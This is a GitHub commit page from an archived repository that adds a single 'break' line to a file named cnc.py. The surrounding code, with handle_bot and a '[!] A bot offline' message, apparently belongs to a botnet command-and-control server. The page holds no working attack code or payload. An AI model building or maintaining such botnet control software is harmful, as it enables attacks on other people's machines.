Skip to content
This repository was archived by the owner on Jan 21, 2020. It is now read-only.

Commit 66a4f88

Browse files
authored
fixed some bug
1 parent 48a141e commit 66a4f88

1 file changed

Lines changed: 1 addition & 0 deletions

File tree

cnc.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -63,6 +63,7 @@ def handle_bot(sock,socketList):
6363
print("[!] A bot offline")
6464
except:
6565
pass
66+
break
6667

6768
def waitConnect(sock,addr):
6869
passwd = sock.recv(1024).decode()

0 commit comments

Comments
 (0)